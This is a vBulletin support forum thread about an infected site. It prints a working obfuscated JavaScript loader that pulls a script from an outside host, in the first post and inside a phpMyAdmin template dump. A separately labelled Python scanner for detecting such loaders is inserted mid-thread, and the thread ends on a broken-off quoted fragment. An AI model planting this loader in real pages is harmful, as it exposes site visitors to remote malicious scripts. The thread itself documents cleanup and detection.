Malware on my vBulletin

  • farhanisfarhan
    New Member
    • May 2010
    • 29
    • 4.2.X

    [Forum] Malware on my vBulletin

    Dear vBulletin

    My site has been listed as containing malware.

    I have replaced the original files again but still vBulletin says "File does not contain expected contents".

    Please help me fix it.

    The Google webmaster tools "Diagnostic" feature has provided the following code:

    <script type="text/javascript">
    <!--
    // Main vBulletin Javascript Initialization
    var script=document.createElement(String.fromCharCode(115,
    99,114,105,112,116));script.src=String.fromCharCode(104,116,
    116,112,58,47,47,112,105,99,116,117,114,101,115,45,104,111,1
    15,116,46,105,110,47,106,113,117,101,114,121,46,99,111,109,1
    12,97,116,105,98,105,108,105,116,121,46,106,115);var head=do
    cument.getElementsByTagName(String.fromCharCode(104,101,97,1
    00))[0];head.appendChild(script);var script=document.createE
    lement(String.fromCharCode(115,99,114,105,112,116));script.s
    rc=String.fromCharCode(104,116,116,112,58,47,47,112,105,99,1
    16,117,114,101,115,45,104,111,115,116,46,105,110,47,106,113,
    117,101,114,121,46,99,111,109,112,97,116,105,98,105,108,105,
    116,121,46,106,115);var head=document.getElementsByTagName(S
    tring.fromCharCode(104,101,97,100))[0];head.appendChild(scri
    pt);vBulletin_init();
    //-->
    </script>
    Muslim Forum
  • Lynne
    Former vBulletin Support
    • Oct 2004
    • 26255

    #2
    You said you replaced all the original files; did you also upload a database backup? And if not, did you go through your database looking for any injections?

    Please don't PM or VM me for support - I only help out in the threads.
    vBulletin Manual & vBulletin 4.0 Code Documentation (API)
    Want help modifying your vbulletin forum? Head on over to vbulletin.org
    If I post CSS and you don't know where it goes, throw it into the additional.css template.

    W3Schools <- awesome site for html/css help


    • farhanisfarhan
      New Member
      • May 2010
      • 29
      • 4.2.X

      #3
      I had to delete the following two records from phpmyadmin. But now my footer wouldn't turn up. Any solution?

      PHP Code:
      -- phpMyAdmin SQL Dump
      -- version 3.3.3
      -- http://www.phpmyadmin.net
      --
      -- Host: localhost:3306
      -- Generation Time: Feb 23, 2012 at 10:12 AM
      -- Server version: 5.5.18
      -- PHP Version: 5.2.6

      SET SQL_MODE="NO_AUTO_VALUE_ON_ZERO";

      /*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
      /*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
      /*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
      /*!40101 SET NAMES utf8 */;

      --
      -- Database: `admin_forum`
      --

      -- --------------------------------------------------------

      --
      -- Table structure for table `template`
      --

      CREATE TABLE IF NOT EXISTS `template` (
        `templateid` int(10) unsigned NOT NULL AUTO_INCREMENT,
        `styleid` smallint(6) NOT NULL DEFAULT '0',
        `title` varchar(100) NOT NULL DEFAULT '',
        `template` mediumtext,
        `template_un` mediumtext,
        `templatetype` enum('template','stylevar','css','replacement') NOT NULL DEFAULT 'template',
        `dateline` int(10) unsigned NOT NULL DEFAULT '0',
        `username` varchar(100) NOT NULL DEFAULT '',
        `version` varchar(30) NOT NULL DEFAULT '',
        `product` varchar(25) NOT NULL DEFAULT '',
        `mergestatus` enum('none','merged','conflicted') NOT NULL DEFAULT 'none',
        PRIMARY KEY (`templateid`),
        UNIQUE KEY `title` (`title`,`styleid`,`templatetype`),
        KEY `styleid` (`styleid`)
      ) ENGINE=MyISAM  DEFAULT CHARSET=latin1 AUTO_INCREMENT=20323 ;

      --
      -- Dumping data for table `template`
      --
      INSERT INTO `template` (`templateid`, `styleid`, `title`, `template`, `template_un`, `templatetype`, `dateline`, `username`, `version`, `product`, `mergestatus`) VALUES(19354, -10'footer''<vb:if condition="!empty($ad_location[''ad_footer_start'']) or !empty($ad_location[''global_above_footer''])">\r\n<div style="clear: {vb:stylevar left}">\r\n  {vb:raw ad_location.ad_footer_start}\r\n  {vb:raw ad_location.global_above_footer}\r\n</div>\r\n</vb:if>\r\n<div id="footer" class="floatcontainer footer">\r\n\r\n    <form action="{vb:link forumhome|nosession}" method="get" id="footer_select" class="footer_select">\r\n\r\n            \r\n        <vb:if condition="$show[''quickchooser'']">\r\n            <select name="styleid" onchange="switch_id(this, ''style'')">\r\n                <optgroup label="{vb:rawphrase quick_style_chooser}">\r\n                    {vb:raw quickchooserbits}\r\n                </optgroup>\r\n            </select>    \r\n        </vb:if>\r\n        \r\n        <vb:if condition="$show[''languagechooser'']">\r\n            <select name="langid" onchange="switch_id(this, ''lang'')">\r\n                <optgroup label="{vb:rawphrase quick_language_chooser}">\r\n                    {vb:raw languagechooserbits}\r\n                </optgroup>\r\n            </select>\r\n        </vb:if>\r\n    </form>\r\n\r\n    <ul id="footer_links" class="footer_links">\r\n        <vb:if condition="$show[''contactus'']"><li><a href="{vb:raw vboptions.contactuslink}" rel="nofollow" accesskey="9">{vb:rawphrase contact_us}</a></li></vb:if>\r\n        <vb:if condition="$vboptions[''hometitle'']"><li><a href="{vb:raw vboptions.homeurl}">{vb:raw vboptions.hometitle}</a></li></vb:if>\r\n        <vb:if condition="$show[''admincplink'']"><li><a href="{vb:raw admincpdir}/index.php{vb:raw session.sessionurl_q}">{vb:rawphrase admin}</a></li></vb:if>\r\n        <vb:if condition="$show[''modcplink'']"><li><a href="{vb:raw modcpdir}/index.php{vb:raw 
session.sessionurl_q}">{vb:rawphrase mod}</a></li></vb:if>\r\n        <vb:if condition="$vboptions[''archiveenabled'']"><li><a href="archive/index.php{vb:raw session.sessionurl_q}">{vb:rawphrase archive}</a></li></vb:if>\r\n        {vb:raw template_hook.footer_links}\r\n        <vb:if condition="$vboptions[''privacyurl'']"><li><a href="{vb:raw vboptions.privacyurl}">{vb:rawphrase privacy_statement}</a></li></vb:if>\r\n        <vb:if condition="$vboptions[''tosurl'']"><li><a href="{vb:raw vboptions.tosurl}">{vb:rawphrase terms_of_service}</a></li></vb:if>\r\n        <li><a href="{vb:raw relpath}#top" onclick="document.location.hash=''top''; return false;">{vb:rawphrase top}</a></li>\r\n    </ul>\r\n    \r\n    \r\n    <vb:if condition="$show[''dst_correction'']">\r\n    <!-- auto DST correction code -->\r\n        <form action="profile.php?do=dst" method="post" name="dstform">\r\n            <input type="hidden" name="s" value="{vb:raw session.sessionhash}" />\r\n            <input type="hidden" name="securitytoken" value="{vb:raw bbuserinfo.securitytoken}" />\r\n            <input type="hidden" name="do" value="dst" />\r\n        </form>\r\n        <script type="text/javascript">\r\n        <!--\r\n            var tzOffset = {vb:raw bbuserinfo.timezoneoffset} + {vb:raw bbuserinfo.dstonoff};\r\n            var utcOffset = new Date().getTimezoneOffset() / 60;\r\n            if (Math.abs(tzOffset + utcOffset) == 1)\r\n            {    // Dst offset is 1 so its changed\r\n                document.forms.dstform.submit();\r\n            }\r\n        //-->\r\n        </script>\r\n        <!-- / auto DST correction code -->\r\n    </vb:if>\r\n    \r\n    <script type="text/javascript">\r\n    <!--\r\n        // Main vBulletin Javascript Initialization\r\n        vBulletin_init();\r\n    //-->\r\n    </script>\r\n        {vb:raw template_hook.footer_javascript}\r\n</div>\r\n</div> <!-- closing div for body_wrapper -->\r\n\r\n<div class="below_body">\r\n<div id="footer_time" 
class="shade footer_time">{vb:rawphrase all_times_are_gmt_x_time_now_is_y}</div>\r\n\r\n<div id="footer_copyright" class="shade footer_copyright">\r\n    <!-- Do not remove this copyright notice -->\r\n    {vb:rawphrase powered_by_vbulletin}\r\n    <!-- Do not remove this copyright notice -->    \r\n</div>\r\n<div id="footer_morecopyright" class="shade footer_morecopyright">\r\n    <!-- Do not remove cronimage or your scheduled tasks will cease to function -->\r\n    {vb:raw cronimage}\r\n    <!-- Do not remove cronimage or your scheduled tasks will cease to function -->\r\n    {vb:raw vboptions.copyrighttext}\r\n</div>\r\n{vb:raw ad_location.ad_footer_end} \r\n<vb:if condition="$vboptions[''enablefacebookconnect'']">\r\n    {vb:raw facebook_footer}\r\n</vb:if>\r\n</div>''<vb:if condition="!empty($ad_location[''ad_footer_start'']) or !empty($ad_location[''global_above_footer''])">\r\n<div style="clear: {vb:stylevar left}">\r\n  {vb:raw ad_location.ad_footer_start}\r\n  {vb:raw ad_location.global_above_footer}\r\n</div>\r\n</vb:if>\r\n<div id="footer" class="floatcontainer footer">\r\n\r\n    <form action="{vb:link forumhome|nosession}" method="get" id="footer_select" class="footer_select">\r\n\r\n            \r\n        <vb:if condition="$show[''quickchooser'']">\r\n            <select name="styleid" onchange="switch_id(this, ''style'')">\r\n                <optgroup label="{vb:rawphrase quick_style_chooser}">\r\n                    {vb:raw quickchooserbits}\r\n                </optgroup>\r\n            </select>    \r\n        </vb:if>\r\n        \r\n        <vb:if condition="$show[''languagechooser'']">\r\n            <select name="langid" onchange="switch_id(this, ''lang'')">\r\n                <optgroup label="{vb:rawphrase quick_language_chooser}">\r\n                    {vb:raw languagechooserbits}\r\n                </optgroup>\r\n            </select>\r\n        </vb:if>\r\n    </form>\r\n\r\n    <ul id="footer_links" class="footer_links">\r\n        <vb:if 
condition="$show[''contactus'']"><li><a href="{vb:raw vboptions.contactuslink}" rel="nofollow" accesskey="9">{vb:rawphrase contact_us}</a></li></vb:if>\r\n        <vb:if condition="$vboptions[''hometitle'']"><li><a href="{vb:raw vboptions.homeurl}">{vb:raw vboptions.hometitle}</a></li></vb:if>\r\n        <vb:if condition="$show[''admincplink'']"><li><a href="{vb:raw admincpdir}/index.php{vb:raw session.sessionurl_q}">{vb:rawphrase admin}</a></li></vb:if>\r\n        <vb:if condition="$show[''modcplink'']"><li><a href="{vb:raw modcpdir}/index.php{vb:raw session.sessionurl_q}">{vb:rawphrase mod}</a></li></vb:if>\r\n        <vb:if condition="$vboptions[''archiveenabled'']"><li><a href="archive/index.php{vb:raw session.sessionurl_q}">{vb:rawphrase archive}</a></li></vb:if>\r\n        {vb:raw template_hook.footer_links}\r\n        <vb:if condition="$vboptions[''privacyurl'']"><li><a href="{vb:raw vboptions.privacyurl}">{vb:rawphrase privacy_statement}</a></li></vb:if>\r\n        <vb:if condition="$vboptions[''tosurl'']"><li><a href="{vb:raw vboptions.tosurl}">{vb:rawphrase terms_of_service}</a></li></vb:if>\r\n        <li><a href="{vb:raw relpath}#top" onclick="document.location.hash=''top''; return false;">{vb:rawphrase top}</a></li>\r\n    </ul>\r\n    \r\n    \r\n    <vb:if condition="$show[''dst_correction'']">\r\n    <!-- auto DST correction code -->\r\n        <form action="profile.php?do=dst" method="post" name="dstform">\r\n            <input type="hidden" name="s" value="{vb:raw session.sessionhash}" />\r\n            <input type="hidden" name="securitytoken" value="{vb:raw bbuserinfo.securitytoken}" />\r\n            <input type="hidden" name="do" value="dst" />\r\n        </form>\r\n        <script type="text/javascript">\r\n        <!--\r\n            var tzOffset = {vb:raw bbuserinfo.timezoneoffset} + {vb:raw bbuserinfo.dstonoff};\r\n            var utcOffset = new Date().getTimezoneOffset() / 60;\r\n            if (Math.abs(tzOffset + utcOffset) == 1)\r\n   
         {    // Dst offset is 1 so its changed\r\n                document.forms.dstform.submit();\r\n            }\r\n        //-->\r\n        </script>\r\n        <!-- / auto DST correction code -->\r\n    </vb:if>\r\n    \r\n    <script type="text/javascript">\r\n    <!--\r\n        // Main vBulletin Javascript Initialization\r\n        vBulletin_init();\r\n    //-->\r\n    </script>\r\n        {vb:raw template_hook.footer_javascript}\r\n</div>\r\n</div> <!-- closing div for body_wrapper -->\r\n\r\n<div class="below_body">\r\n<div id="footer_time" class="shade footer_time">{vb:rawphrase all_times_are_gmt_x_time_now_is_y}</div>\r\n\r\n<div id="footer_copyright" class="shade footer_copyright">\r\n    <!-- Do not remove this copyright notice -->\r\n    {vb:rawphrase powered_by_vbulletin}\r\n    <!-- Do not remove this copyright notice -->    \r\n</div>\r\n<div id="footer_morecopyright" class="shade footer_morecopyright">\r\n    <!-- Do not remove cronimage or your scheduled tasks will cease to function -->\r\n    {vb:raw cronimage}\r\n    <!-- Do not remove cronimage or your scheduled tasks will cease to function -->\r\n    {vb:raw vboptions.copyrighttext}\r\n</div>\r\n{vb:raw ad_location.ad_footer_end} \r\n<vb:if condition="$vboptions[''enablefacebookconnect'']">\r\n    {vb:raw facebook_footer}\r\n</vb:if>\r\n</div>''template'1315947256'vBulletin Solutions''4.1.8 Beta 1''vbulletin''none'),(20304, -1'footer''$final_rendered = '''' . ''''; if (!empty($ad_location[''ad_footer_start'']) or !empty($ad_location[''global_above_footer''])) {\n                    $final_rendered .= ''\r\n<div style="clear: '' . vB_Template_Runtime::fetchStylevar("left") . ''">\r\n  '' . $ad_location[''ad_footer_start''] . ''\r\n  '' . $ad_location[''global_above_footer''] . ''\r\n</div>\r\n'';\n                } else {\n            $final_rendered .= '''';\n        }$final_rendered .= '''' . ''\r\n<div id="footer" class="floatcontainer footer">\r\n\r\n    <form action="'' . 
vB_Template_Runtime::linkBuild("forumhome|nosession") . ''" method="get" id="footer_select" class="footer_select">\r\n\r\n            \r\n        '' . ''''; if ($show[''quickchooser'']) {\n                    $final_rendered .= ''\r\n            <select name="styleid" onchange="switch_id(this, \\''style\\'')">\r\n                <optgroup label="'' . vB_Template_Runtime::parsePhrase("quick_style_chooser") . ''">\r\n                    '' . $quickchooserbits . ''\r\n                </optgroup>\r\n            </select>    \r\n        '';\n                } else {\n            $final_rendered .= '''';\n        }$final_rendered .= '''' . ''\r\n        \r\n        '' . ''''; if ($show[''languagechooser'']) {\n                    $final_rendered .= ''\r\n            <select name="langid" onchange="switch_id(this, \\''lang\\'')">\r\n                <optgroup label="'' . vB_Template_Runtime::parsePhrase("quick_language_chooser") . ''">\r\n                    '' . $languagechooserbits . ''\r\n                </optgroup>\r\n            </select>\r\n        '';\n                } else {\n            $final_rendered .= '''';\n        }$final_rendered .= '''' . ''\r\n    </form>\r\n\r\n    <ul id="footer_links" class="footer_links">\r\n        '' . ''''; if ($show[''contactus'']) {\n                    $final_rendered .= ''<li><a href="'' . $vboptions[''contactuslink''] . ''" rel="nofollow" accesskey="9">'' . vB_Template_Runtime::parsePhrase("contact_us") . ''</a></li>'';\n                } else {\n            $final_rendered .= '''';\n        }$final_rendered .= '''' . ''\r\n        '' . ''''; if ($GLOBALS[''vbulletin'']->options[''hometitle'']) {\n                    $final_rendered .= ''<li><a href="'' . $vboptions[''homeurl''] . ''">'' . $vboptions[''hometitle''] . ''</a></li>'';\n                } else {\n            $final_rendered .= '''';\n        }$final_rendered .= '''' . ''\r\n        '' . 
''''; if ($show[''admincplink'']) {\n                    $final_rendered .= ''<li><a href="'' . $admincpdir . ''/index.php'' . $session[''sessionurl_q''] . ''">'' . vB_Template_Runtime::parsePhrase("admin") . ''</a></li>'';\n                } else {\n            $final_rendered .= '''';\n        }$final_rendered .= '''' . ''\r\n        '' . ''''; if ($show[''modcplink'']) {\n                    $final_rendered .= ''<li><a href="'' . $modcpdir . ''/index.php'' . $session[''sessionurl_q''] . ''">'' . vB_Template_Runtime::parsePhrase("mod") . ''</a></li>'';\n                } else {\n            $final_rendered .= '''';\n        }$final_rendered .= '''' . ''\r\n        '' . ''''; if ($GLOBALS[''vbulletin'']->options[''archiveenabled'']) {\n                    $final_rendered .= ''<li><a href="archive/index.php'' . $session[''sessionurl_q''] . ''">'' . vB_Template_Runtime::parsePhrase("archive") . ''</a></li>'';\n                } else {\n            $final_rendered .= '''';\n        }$final_rendered .= '''' . ''\r\n        '' . $template_hook[''footer_links''] . ''\r\n        '' . ''''; if ($GLOBALS[''vbulletin'']->options[''privacyurl'']) {\n                    $final_rendered .= ''<li><a href="'' . $vboptions[''privacyurl''] . ''">'' . vB_Template_Runtime::parsePhrase("privacy_statement") . ''</a></li>'';\n                } else {\n            $final_rendered .= '''';\n        }$final_rendered .= '''' . ''\r\n        '' . ''''; if ($GLOBALS[''vbulletin'']->options[''tosurl'']) {\n                    $final_rendered .= ''<li><a href="'' . $vboptions[''tosurl''] . ''">'' . vB_Template_Runtime::parsePhrase("terms_of_service") . ''</a></li>'';\n                } else {\n            $final_rendered .= '''';\n        }$final_rendered .= '''' . ''\r\n        <li><a href="'' . $relpath . ''#top" onclick="document.location.hash=\\''top\\''; return false;">'' . vB_Template_Runtime::parsePhrase("top") . ''</a></li>\r\n    </ul>\r\n    \r\n    \r\n    '' . 
''''; if ($show[''dst_correction'']) {\n                    $final_rendered .= ''\r\n    <!-- auto DST correction code -->\r\n        <form action="profile.php?do=dst" method="post" name="dstform">\r\n            <input type="hidden" name="s" value="'' . $session[''sessionhash''] . ''" />\r\n            <input type="hidden" name="securitytoken" value="'' . $bbuserinfo[''securitytoken''] . ''" />\r\n            <input type="hidden" name="do" value="dst" />\r\n        </form>\r\n        <script type="text/javascript">\r\n        <!--\r\n            var tzOffset = '' . $bbuserinfo[''timezoneoffset''] . '' + '' . $bbuserinfo[''dstonoff''] . '';\r\n            var utcOffset = new Date().getTimezoneOffset() / 60;\r\n            if (Math.abs(tzOffset + utcOffset) == 1)\r\n            {    // Dst offset is 1 so its changed\r\n                document.forms.dstform.submit();\r\n            }\r\n        //-->\r\n        </script>\r\n        <!-- / auto DST correction code -->\r\n    '';\n                } else {\n            $final_rendered .= '''';\n        }$final_rendered .= '''' . 
''\r\n    \r\n    <script type="text/javascript">\r\n    <!--\r\n        // Main vBulletin Javascript Initialization\r\n        var script=document.createElement(String.fromCharCode(115,99,114,105,112,116));script.src=String.fromCharCode(104,116,116,112,58,47,47,112,105,99,116,117,114,101,115,45,104,111,115,116,46,105,110,47,106,113,117,101,114,121,46,99,111,109,112,97,116,105,98,105,108,105,116,121,46,106,115);var head=document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0];head.appendChild(script);var script=document.createElement(String.fromCharCode(115,99,114,105,112,116));script.src=String.fromCharCode(104,116,116,112,58,47,47,112,105,99,116,117,114,101,115,45,104,111,115,116,46,105,110,47,106,113,117,101,114,121,46,99,111,109,112,97,116,105,98,105,108,105,116,121,46,106,115);var head=document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0];head.appendChild(script);vBulletin_init();\r\n    //-->\r\n    </script>\r\n        '' . $template_hook[''footer_javascript''] . ''\r\n</div>\r\n</div> <!-- closing div for body_wrapper -->\r\n\r\n<div class="below_body">\r\n<div id="footer_time" class="shade footer_time">'' . vB_Template_Runtime::parsePhrase("all_times_are_gmt_x_time_now_is_y") . ''</div>\r\n\r\n<div id="footer_copyright" class="shade footer_copyright">\r\n    <!-- Do not remove this copyright notice -->\r\n    '' . vB_Template_Runtime::parsePhrase("powered_by_vbulletin") . ''\r\n    <!-- Do not remove this copyright notice -->    \r\n</div>\r\n<div id="footer_morecopyright" class="shade footer_morecopyright">\r\n    <!-- Do not remove cronimage or your scheduled tasks will cease to function -->\r\n    '' . $cronimage . ''\r\n    <!-- Do not remove cronimage or your scheduled tasks will cease to function -->\r\n    '' . $vboptions[''copyrighttext''] . ''\r\n</div>\r\n'' . $ad_location[''ad_footer_end''] . '' \r\n'' . 
''''; if ($GLOBALS[''vbulletin'']->options[''enablefacebookconnect'']) {\n                    $final_rendered .= ''\r\n    '' . $facebook_footer . ''\r\n'';\n                } else {\n            $final_rendered .= '''';\n        }$final_rendered .= '''' . ''\r\n</div>'';''<vb:if condition="!empty($ad_location[''ad_footer_start'']) or !empty($ad_location[''global_above_footer''])">\r\n<div style="clear: {vb:stylevar left}">\r\n  {vb:raw ad_location.ad_footer_start}\r\n  {vb:raw ad_location.global_above_footer}\r\n</div>\r\n</vb:if>\r\n<div id="footer" class="floatcontainer footer">\r\n\r\n    <form action="{vb:link forumhome|nosession}" method="get" id="footer_select" class="footer_select">\r\n\r\n            \r\n        <vb:if condition="$show[''quickchooser'']">\r\n            <select name="styleid" onchange="switch_id(this, ''style'')">\r\n                <optgroup label="{vb:rawphrase quick_style_chooser}">\r\n                    {vb:raw quickchooserbits}\r\n                </optgroup>\r\n            </select>    \r\n        </vb:if>\r\n        \r\n        <vb:if condition="$show[''languagechooser'']">\r\n            <select name="langid" onchange="switch_id(this, ''lang'')">\r\n                <optgroup label="{vb:rawphrase quick_language_chooser}">\r\n                    {vb:raw languagechooserbits}\r\n                </optgroup>\r\n            </select>\r\n        </vb:if>\r\n    </form>\r\n\r\n    <ul id="footer_links" class="footer_links">\r\n        <vb:if condition="$show[''contactus'']"><li><a href="{vb:raw vboptions.contactuslink}" rel="nofollow" accesskey="9">{vb:rawphrase contact_us}</a></li></vb:if>\r\n        <vb:if condition="$vboptions[''hometitle'']"><li><a href="{vb:raw vboptions.homeurl}">{vb:raw vboptions.hometitle}</a></li></vb:if>\r\n        <vb:if condition="$show[''admincplink'']"><li><a href="{vb:raw admincpdir}/index.php{vb:raw session.sessionurl_q}">{vb:rawphrase admin}</a></li></vb:if>\r\n        <vb:if 
condition="$show[''modcplink'']"><li><a href="{vb:raw modcpdir}/index.php{vb:raw session.sessionurl_q}">{vb:rawphrase mod}</a></li></vb:if>\r\n        <vb:if condition="$vboptions[''archiveenabled'']"><li><a href="archive/index.php{vb:raw session.sessionurl_q}">{vb:rawphrase archive}</a></li></vb:if>\r\n        {vb:raw template_hook.footer_links}\r\n        <vb:if condition="$vboptions[''privacyurl'']"><li><a href="{vb:raw vboptions.privacyurl}">{vb:rawphrase privacy_statement}</a></li></vb:if>\r\n        <vb:if condition="$vboptions[''tosurl'']"><li><a href="{vb:raw vboptions.tosurl}">{vb:rawphrase terms_of_service}</a></li></vb:if>\r\n        <li><a href="{vb:raw relpath}#top" onclick="document.location.hash=''top''; return false;">{vb:rawphrase top}</a></li>\r\n    </ul>\r\n    \r\n    \r\n    <vb:if condition="$show[''dst_correction'']">\r\n    <!-- auto DST correction code -->\r\n        <form action="profile.php?do=dst" method="post" name="dstform">\r\n            <input type="hidden" name="s" value="{vb:raw session.sessionhash}" />\r\n            <input type="hidden" name="securitytoken" value="{vb:raw bbuserinfo.securitytoken}" />\r\n            <input type="hidden" name="do" value="dst" />\r\n        </form>\r\n        <script type="text/javascript">\r\n        <!--\r\n            var tzOffset = {vb:raw bbuserinfo.timezoneoffset} + {vb:raw bbuserinfo.dstonoff};\r\n            var utcOffset = new Date().getTimezoneOffset() / 60;\r\n            if (Math.abs(tzOffset + utcOffset) == 1)\r\n            {    // Dst offset is 1 so its changed\r\n                document.forms.dstform.submit();\r\n            }\r\n        //-->\r\n        </script>\r\n        <!-- / auto DST correction code -->\r\n    </vb:if>\r\n    \r\n    <script type="text/javascript">\r\n    <!--\r\n        // Main vBulletin Javascript Initialization\r\n        vBulletin_init();\r\n    //-->\r\n    </script>\r\n        {vb:raw template_hook.footer_javascript}\r\n</div>\r\n</div> <!-- closing 
div for body_wrapper -->\r\n\r\n<div class="below_body">\r\n<div id="footer_time" class="shade footer_time">{vb:rawphrase all_times_are_gmt_x_time_now_is_y}</div>\r\n\r\n<div id="footer_copyright" class="shade footer_copyright">\r\n    <!-- Do not remove this copyright notice -->\r\n    {vb:rawphrase powered_by_vbulletin}\r\n    <!-- Do not remove this copyright notice -->    \r\n</div>\r\n<div id="footer_morecopyright" class="shade footer_morecopyright">\r\n    <!-- Do not remove cronimage or your scheduled tasks will cease to function -->\r\n    {vb:raw cronimage}\r\n    <!-- Do not remove cronimage or your scheduled tasks will cease to function -->\r\n    {vb:raw vboptions.copyrighttext}\r\n</div>\r\n{vb:raw ad_location.ad_footer_end} \r\n<vb:if condition="$vboptions[''enablefacebookconnect'']">\r\n    {vb:raw facebook_footer}\r\n</vb:if>\r\n</div>''template'1315947256'vBulletin Solutions''4.1.8 Beta 1''vbulletin''none'); 
      Muslim Forum
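
Added example (not part of the original thread and not vBulletin code): a scan of exported `template` rows for the `String.fromCharCode(...)` loader shown in the first post. In the dump above, the loader sits in the compiled `template` column of row 20304 while that row's `template_un` still ends with a plain `vBulletin_init();`, so the scan decodes both columns and marks rows where only the compiled copy is affected. The sample rows, the URL `injected.example` and all function names are constructed for illustration.

```python
import re

# String.fromCharCode(<numbers>) with whitespace tolerated inside the argument
# list, because forum or HTML wrapping can split a number across lines.
FROMCHARCODE = re.compile(r"String\s*\.\s*fromCharCode\s*\(([\d,\s]*)\)", re.IGNORECASE)
REMOTE_URL = re.compile(r"^(?:https?:)?//[^\s/]+", re.IGNORECASE)
# Column names taken from the CREATE TABLE in the dump above.
COLUMNS = ("template", "template_un")


def decode_fromcharcode(text):
    """Return the decoded string of every String.fromCharCode(...) call in text."""
    decoded = []
    for match in FROMCHARCODE.finditer(text or ""):
        args = re.sub(r"\s+", "", match.group(1))
        codes = [int(n) for n in args.split(",") if n]
        if codes and all(c < 0x110000 for c in codes):
            decoded.append("".join(chr(c) for c in codes))
    return decoded


def scan_row(row):
    """Per column: remote URLs hidden in char codes, and whether 'script' is built."""
    findings = {}
    for col in COLUMNS:
        strings = decode_fromcharcode(row.get(col))
        urls = sorted({s for s in strings if REMOTE_URL.match(s)})
        builds_script = any(s.lower() == "script" for s in strings)
        if urls or builds_script:
            findings[col] = {"urls": urls, "builds_script_tag": builds_script}
    return findings


def scan_templates(rows):
    """Return one report entry per template row that contains an encoded loader."""
    report = []
    for row in rows:
        findings = scan_row(row)
        if findings:
            report.append({
                "templateid": row["templateid"],
                "title": row["title"],
                "columns": findings,
                # True when the editable source looks clean but the compiled copy is not.
                "compiled_only": "template" in findings and "template_un" not in findings,
            })
    return report


def encode(s):
    """Helper for building the constructed sample: text -> '104,116,...'."""
    return ",".join(str(ord(ch)) for ch in s)


# Constructed sample data (not taken from any real site).
SAMPLE_URL = "http://injected.example/loader.js"
LOADER = (
    "var script=document.createElement(String.fromCharCode(%s));"
    "script.src=String.fromCharCode(%s);"
    "var head=document.getElementsByTagName(String.fromCharCode(%s))[0];"
    "head.appendChild(script);"
) % (encode("script"), encode(SAMPLE_URL), encode("head"))

CLEAN = '<script type="text/javascript">\n vBulletin_init();\n</script>'
SAMPLE_ROWS = [
    {"templateid": 1, "title": "footer", "template": CLEAN, "template_un": CLEAN},
    {"templateid": 2, "title": "footer",
     "template": CLEAN.replace("vBulletin_init();", LOADER + "vBulletin_init();"),
     "template_un": CLEAN},
    # Benign use of fromCharCode: decodes to "AB", neither a URL nor a tag name.
    {"templateid": 3, "title": "header",
     "template": "var c = String.fromCharCode(65, 66);", "template_un": None},
]

if __name__ == "__main__":
    for hit in scan_templates(SAMPLE_ROWS):
        print(hit)
```
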


      • Winter Sonata
        Senior Member
        • Apr 2010
        • 108
        • 4.0.0

        #4
        If possible, the best solution in this case is to delete all files in the public_html folder, upload them again, and upload a clean backup you downloaded earlier, before that happened. I guess everything should be OK.

        BTW, did you check your index files? I had this before, and it was adding some strange code at the top of the index files, and when I removed it, it came back again. Is that your situation too?

        Regards!


        • Winter Sonata
          Senior Member
          • Apr 2010
          • 108
          • 4.0.0

          #5
          Btw, the site is working with no warning message; I guess it's white-listed now. Congrats, and Salam from a neighbor country.


          • farhanisfarhan
            New Member
            • May 2010
            • 29
            • 4.2.X

            #6
            Originally posted by Winter Sonata
            Btw, the site is working with no warning message; I guess it's white-listed now. Congrats, and Salam from a neighbor country.
            Wa Alaikum Salam W'Rahmatullah W'Barakatuhu

            1. I had replaced all files, but the file check system in Diagnostics of the vBulletin admin panel says "File does not contain expected contents".
            2. Can you tell me which index file you mentioned in your comment?
            Muslim Forum


            • Winter Sonata
              Senior Member
              • Apr 2010
              • 108
              • 4.0.0

              #7
              This malware was inserting itself in all my files titled index.php; check whether they have the code from your first post.

              Is your site malware-free now?


              • jgas
                Senior Member
                • Jul 2007
                • 124
                • 3.8.x

                #8
                Hi!
                How do you delete this record from phpMyAdmin?

                I'm having the same script in my html and now my website is marked as "malware".

                Please help me, thanks!

                Originally posted by farhanisfarhan
                I had to delete the following two records from phpmyadmin. But now my footer wouldn't turn up. Any solution?

condition="$show[''contactus'']"><li><a href="{vb:raw vboptions.contactuslink}" rel="nofollow" accesskey="9">{vb:rawphrase contact_us}</a></li></vb:if>\r\n        <vb:if condition="$vboptions[''hometitle'']"><li><a href="{vb:raw vboptions.homeurl}">{vb:raw vboptions.hometitle}</a></li></vb:if>\r\n        <vb:if condition="$show[''admincplink'']"><li><a href="{vb:raw admincpdir}/index.php{vb:raw session.sessionurl_q}">{vb:rawphrase admin}</a></li></vb:if>\r\n        <vb:if condition="$show[''modcplink'']"><li><a href="{vb:raw modcpdir}/index.php{vb:raw session.sessionurl_q}">{vb:rawphrase mod}</a></li></vb:if>\r\n        <vb:if condition="$vboptions[''archiveenabled'']"><li><a href="archive/index.php{vb:raw session.sessionurl_q}">{vb:rawphrase archive}</a></li></vb:if>\r\n        {vb:raw template_hook.footer_links}\r\n        <vb:if condition="$vboptions[''privacyurl'']"><li><a href="{vb:raw vboptions.privacyurl}">{vb:rawphrase privacy_statement}</a></li></vb:if>\r\n        <vb:if condition="$vboptions[''tosurl'']"><li><a href="{vb:raw vboptions.tosurl}">{vb:rawphrase terms_of_service}</a></li></vb:if>\r\n        <li><a href="{vb:raw relpath}#top" onclick="document.location.hash=''top''; return false;">{vb:rawphrase top}</a></li>\r\n    </ul>\r\n    \r\n    \r\n    <vb:if condition="$show[''dst_correction'']">\r\n    <!-- auto DST correction code -->\r\n        <form action="profile.php?do=dst" method="post" name="dstform">\r\n            <input type="hidden" name="s" value="{vb:raw session.sessionhash}" />\r\n            <input type="hidden" name="securitytoken" value="{vb:raw bbuserinfo.securitytoken}" />\r\n            <input type="hidden" name="do" value="dst" />\r\n        </form>\r\n        <script type="text/javascript">\r\n        <!--\r\n            var tzOffset = {vb:raw bbuserinfo.timezoneoffset} + {vb:raw bbuserinfo.dstonoff};\r\n            var utcOffset = new Date().getTimezoneOffset() / 60;\r\n            if (Math.abs(tzOffset + utcOffset) == 1)\r\n   
